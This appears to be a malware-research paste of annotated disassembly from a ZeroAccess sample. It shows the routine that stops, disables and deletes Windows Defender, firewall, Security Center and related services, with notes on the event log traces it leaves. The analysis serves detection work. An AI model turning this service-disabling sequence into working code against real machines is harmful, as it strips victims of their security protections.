
#MalwareMustDie! ZeroAccess: killing processes PoC

MalwareMustDie Feb 6th, 2013 169 Never
  1. // #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER
  2. // Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
  3. // In the .text PE section the operation was found
  4. // to close all processes of:
  5. // MsMpSvc, windefend, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
  6. // @unixfreaxjp /malware]$ date | Wed Feb  6 15:53:41 JST 2013
  7.  
  8. // usage of DisableThreadLibraryCalls :
  9. //  A function that lets a DLL disable the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notification calls.
  10.  
  // Excerpt from the DLL entry path (the enclosing routine and loc_401832 are not in this listing).
  11. 0x4017FB     push    [ebp+hLibModule] ; hLibModule = this module's handle, taken from the frame (presumably DllMain's hinstDLL — confirm)
  12. 0x4017FE     call    ds:DisableThreadLibraryCalls ; stop DLL_THREAD_ATTACH/DETACH notifications for this module
  13. 0x401804     call    sub_4016D1      ; sub_4016D1 is not in this excerpt; its result gates the jump below
  14. 0x401809     test    eax, eax
  15. 0x40180B     jz      short loc_401832 ; eax == 0 -> skip ahead (target not shown)
  16.  
  17. // Opening keyroot
  18.  
  // Excerpt of sub_402634 (proc header, the arguments pushed before 0x402659, and the
  // loc_40274B exit are outside this listing).
  // Register roles in this section: ebx = SERVICE_ALL_ACCESS, edi = &OpenServiceW,
  // esi = hService handed to sub_4024E2 in a register rather than on the stack.
  // ebx/esi/edi are callee-saved; pushed at 0x402694..0x402696, popped at 0x402748..0x40274A.
  19. 0x402659     call    ds:ZwOpenKey    ; key path / ObjectAttributes were pushed before this line (not shown)
  20. 0x40265F     test    eax, eax        ; NTSTATUS in eax
  21. 0x402661     jl      short loc_40267A ; negative status = open failed -> skip the value deletion
  22. 0x402663     push    offset asc_41D0DC ; " \"" (ValueName; ZwDeleteValueKey expects a PUNICODE_STRING, IDA renders the slot as a plain string — verify)
  23. 0x402668     push    [ebp+hSCObject] ; KeyHandle — IDA's slot name is reused; here it presumably holds the handle written by ZwOpenKey (ZwClose below confirms it is a handle)
  24. 0x40266B     call    ds:ZwDeleteValueKey ; result unchecked
  25. 0x402671     push    [ebp+hSCObject]
  26. 0x402674     call    ds:ZwClose      ; release the key handle
  27.  
  28. // OpenSCManagerW: connect to the local SCM with full access (fails without sufficient privilege)
  29.  
  30. 0x40267A loc_40267A:     ; CODE XREF: sub_402634+2Dj
  31. 0x40267A     push    0F003Fh         ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
  32. 0x40267F     push    0   ; lpDatabaseName (NULL = active services database)
  33. 0x402681     push    0   ; lpMachineName (NULL = local machine)
  34. 0x402683     call    ds:OpenSCManagerW ; Establish a connection to the service
  35.                                        ; control manager on the specified computer
  36.                                        ; and opens the specified database
  37. 0x402689     mov     [ebp+hSCObject], eax ; hSCManager kept in the frame for the later opens
  38. 0x40268C     test    eax, eax
  39. 0x40268E     jz      loc_40274B      ; no SCM handle (e.g. access denied) -> skip every service (target not shown)
  40. 0x402694     push    ebx             ; save callee-saved registers used below
  41. 0x402695     push    esi
  42. 0x402696     push    edi
  43.  
  44. // opening service "MsMpSvc" — the first of seven identical open-then-sub_4024E2 blocks
  45.  
  46. 0x402697     mov     edi, ds:OpenServiceW ; edi = &OpenServiceW, reused for all seven opens
  47. 0x40269D     mov     ebx, 0F01FFh    ; ebx = SERVICE_ALL_ACCESS, reused for all seven opens
  48. 0x4026A2     push    ebx ; dwDesiredAccess
  49. 0x4026A3     push    offset ServiceName ; "MsMpSvc" (Microsoft Antimalware / Windows Defender service)
  50. 0x4026A8     push    eax ; hSCManager (still in eax from OpenSCManagerW; the later opens reload it from [ebp+hSCObject])
  51. 0x4026A9     call    edi ; OpenServiceW
  52. 0x4026AB     test    eax, eax
  53. 0x4026AD     jz      short loc_4026B6 ; open failed (service absent or access denied) -> try the next one
  54. 0x4026AF     mov     esi, eax        ; esi = hService; sub_4024E2 reads it from esi and closes it itself
  55. 0x4026B1     call    sub_4024E2      ; stop + disable + delete this service (see sub_4024E2 below)
  56.  
  57. // opening service "windefend" — same pattern as MsMpSvc
  58.  
  59. 0x4026B6 loc_4026B6:     ; CODE XREF: sub_402634+79j
  60. 0x4026B6     push    ebx ; dwDesiredAccess
  61. 0x4026B7     push    offset aWindefend ; "windefend" (Windows Defender service)
  62. 0x4026BC     push    [ebp+hSCObject] ; hSCManager
  63. 0x4026BF     call    edi ; OpenServiceW
  64. 0x4026C1     test    eax, eax
  65. 0x4026C3     jz      short loc_4026CC
  66. 0x4026C5     mov     esi, eax
  67. 0x4026C7     call    sub_4024E2
  68.  
  69. // opening service "SharedAccess" — same pattern
  70.  
  71. 0x4026CC loc_4026CC:     ; CODE XREF: sub_402634+8Fj
  72. 0x4026CC     push    ebx ; dwDesiredAccess
  73. 0x4026CD     push    offset aSharedaccess ; "SharedAccess" (Internet Connection Sharing / Windows Firewall on older Windows)
  74. 0x4026D2     push    [ebp+hSCObject] ; hSCManager
  75. 0x4026D5     call    edi ; OpenServiceW
  76. 0x4026D7     test    eax, eax
  77. 0x4026D9     jz      short loc_4026E2
  78. 0x4026DB     mov     esi, eax
  79. 0x4026DD     call    sub_4024E2
  80. 0x4026E2
  81.  
  82. // opening service "iphlpsvc" — same pattern
  83.  
  84. 0x4026E2 loc_4026E2:     ; CODE XREF: sub_402634+A5j
  85. 0x4026E2     push    ebx ; dwDesiredAccess
  86. 0x4026E3     push    offset aIphlpsvc ; "iphlpsvc" (IP Helper service)
  87. 0x4026E8     push    [ebp+hSCObject] ; hSCManager
  88. 0x4026EB     call    edi ; OpenServiceW
  89. 0x4026ED     test    eax, eax
  90. 0x4026EF     jz      short loc_4026F8
  91. 0x4026F1     mov     esi, eax
  92. 0x4026F3     call    sub_4024E2
  93. 0x4026F8
  94.  
  95. // opening service "wscsvc" — same pattern
  96.  
  97. 0x4026F8 loc_4026F8:     ; CODE XREF: sub_402634+BBj
  98. 0x4026F8     push    ebx ; dwDesiredAccess
  99. 0x4026F9     push    offset aWscsvc  ; "wscsvc" (Security Center service)
  100. 0x4026FE     push    [ebp+hSCObject] ; hSCManager
  101. 0x402701     call    edi ; OpenServiceW
  102. 0x402703     test    eax, eax
  103. 0x402705     jz      short loc_40270E
  104. 0x402707     mov     esi, eax
  105. 0x402709     call    sub_4024E2
  106. 0x40270E
  107.  
  108. // opening service "mpssvc" — same pattern
  109.  
  110. 0x40270E loc_40270E:     ; CODE XREF: sub_402634+D1j
  111. 0x40270E     push    ebx ; dwDesiredAccess
  112. 0x40270F     push    offset aMpssvc  ; "mpssvc" (Windows Firewall service)
  113. 0x402714     push    [ebp+hSCObject] ; hSCManager
  114. 0x402717     call    edi ; OpenServiceW
  115. 0x402719     test    eax, eax
  116. 0x40271B     jz      short loc_402724
  117. 0x40271D     mov     esi, eax
  118. 0x40271F     call    sub_4024E2
  119. 0x402724
  120.  
  121. // opening service "bfe" — same pattern
  122.  
  123. 0x402724 loc_402724:     ; CODE XREF: sub_402634+E7j
  124. 0x402724     push    ebx ; dwDesiredAccess
  125. 0x402725     push    offset aBfe     ; "bfe" (Base Filtering Engine, which the firewall depends on)
  126. 0x40272A     push    [ebp+hSCObject] ; hSCManager
  127. 0x40272D     call    edi ; OpenServiceW
  128. 0x40272F     test    eax, eax
  129. 0x402731     jz      short loc_40273A
  130. 0x402733     mov     esi, eax
  131. 0x402735     call    sub_4024E2
  132. 0x40273A
  133.  
  134. // Close them handles..
  135.  
  136. 0x40273A loc_40273A:     ; CODE XREF: sub_402634+FDj
  137. 0x40273A     push    [ebp+hSCObject] ; hSCObject = the SCM handle (each service handle was already closed inside sub_4024E2)
  138. 0x40273D     call    ds:CloseServiceHandle
  139. 0x402743     call    sub_402593      ; not in this excerpt
  140. 0x402748     pop     edi             ; restore the registers pushed at 0x402694..0x402696
  141. 0x402749     pop     esi
  142. 0x40274A     pop     ebx
  143.  
  144. // Checking those services...
  145.  
  //-----------------------------------------------------------------------
  // sub_4024E2 — stop, disable and delete one service.
  // Despite the page title, no process is terminated here: the service is
  // sent SERVICE_CONTROL_STOP, its start type is set to SERVICE_DISABLED,
  // and it is then deleted from the SCM.
  // ABI:   custom; the argument arrives in a register, not on the stack
  // In:    esi = hService (each call site in sub_402634 does `mov esi, eax` first)
  // Out:   eax = CloseServiceHandle's result (callers do not use it)
  // Clobb: eax, ecx, edx (Win32 calls), flags; edi saved/restored; esi read only
  // Stack: 1Ch bytes of locals (the SERVICE_STATUS out-parameter)
  // The results of ChangeServiceConfigW and DeleteService are never checked,
  // so each target is handled best-effort and the next one is tried regardless.
  // Defender's view: this sequence surfaces as Service Control Manager events
  // in the System log — 7036 (service entered the stopped state) and 7040
  // (start type changed to disabled) — for the security services named at the
  // call sites, followed by those services disappearing from the SCM.
  //-----------------------------------------------------------------------
  146. 0x4024E2 sub_4024E2      proc near ;
  147. 0x4024E2
  148. 0x4024E2 ServiceStatus   = _SERVICE_STATUS ptr -1Ch
  149. 0x4024E2
  150. 0x4024E2     sub     esp, 1Ch        ; room for the SERVICE_STATUS local
  151. 0x4024E5     push    edi             ; callee-saved; used as the retry counter
  152. 0x4024E6     push    4               ; edi = 4 (push/pop is the short form of mov edi, 4)
  153. 0x4024E8     pop     edi             ; at most 4 stop attempts
  154. 0x4024E9
  155.  
  156. // preparations...
  157.  
  158. 0x4024E9 loc_4024E9:                 ; retry loop; invariant: edi = attempts remaining, > 0 here
  159. 0x4024E9     lea     eax, [esp+20h+ServiceStatus] ; = esp+4, the local sitting just above the saved edi
  160. 0x4024ED     push    eax             ; lpServiceStatus
  161. 0x4024EE     push    1               ; dwControl = SERVICE_CONTROL_STOP
  162. 0x4024F0     push    esi             ; hService
  163. 0x4024F1     call    ds:ControlService ; <==========To control code to a Win32 service
  164. 0x4024F7     test    eax, eax
  165. 0x4024F9     jnz     short loc_402516 ; stop request accepted -> go disable/delete
  166. 0x4024FB     call    ds:GetLastError
  167. 0x402501     cmp     eax, 41Bh       ; ERROR_DEPENDENT_SERVICES_RUNNING (1051)
  168. 0x402506     jnz     short loc_402516 ; any other error: stop retrying, still disable/delete
  169. 0x402508     push    3E8h            ; dwMilliseconds = 1000
  170. 0x40250D     call    ds:Sleep        ; give dependent services a second to wind down
  171. 0x402513     dec     edi
  172. 0x402514     jnz     short loc_4024E9 ; retry while attempts remain
  173. 0x402516
  174. 0x402516 loc_402516:                 ; reached on stop success, on a non-1051 error, or after 4 failed attempts
  175. 0x402516     xor     eax, eax        ; eax = 0 / NULL for the "leave unchanged" arguments below
  176. 0x402518     push    eax             ; lpDisplayName (NULL = unchanged)
  177. 0x402519     push    eax             ; lpPassword
  178. 0x40251A     push    eax             ; lpServiceStartName
  179. 0x40251B     push    eax             ; lpDependencies
  180. 0x40251C     push    eax             ; lpdwTagId
  181. 0x40251D     push    eax             ; lpLoadOrderGroup
  182. 0x40251E     push    eax             ; lpBinaryPathName (NULL = unchanged)
  183. 0x40251F     push    eax             ; dwErrorControl = SERVICE_ERROR_IGNORE
  184. 0x402520     push    4               ; dwStartType = SERVICE_DISABLED -> the service will not start again at boot
  185. 0x402522     push    20h             ; dwServiceType = SERVICE_WIN32_SHARE_PROCESS
  186. 0x402524     push    esi             ; hService
  187.  
  188. // stop it all....
  189.  
  190. 0x402525     call    ds:ChangeServiceConfigW <=== triger to change status service.. ; return value unchecked
  191. 0x40252B     push    esi             ; <========value of hService
  192. 0x40252C     call    ds:DeleteService ; marks the service for deletion once it is stopped and its last handle closes; result unchecked
  193. 0x402532     push    esi             ; hService (the handle from OpenServiceW, not the SCM handle)
  194. 0x402533     call    ds:CloseServiceHandle ; closing this handle lets the pending deletion complete
  195. 0x402539     pop     edi             ; restore the caller's edi
  196. 0x40253A     add     esp, 1Ch        ; drop the SERVICE_STATUS local
  197. 0x40253D     retn
  198. 0x40253D sub_4024E2      endp
  199.  
  200. ---
  201. #MalwareMustDie